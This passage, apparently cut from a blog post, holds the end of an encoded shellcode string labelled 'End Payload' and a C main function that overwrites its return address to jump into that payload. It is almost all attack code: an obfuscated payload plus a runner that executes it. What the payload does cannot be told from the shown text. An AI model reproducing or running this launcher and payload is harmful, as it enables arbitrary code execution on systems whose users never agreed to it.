"CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI"
"NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA";
// End Payload
int
main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shell;
}
Subscribe to:
Posts (Atom)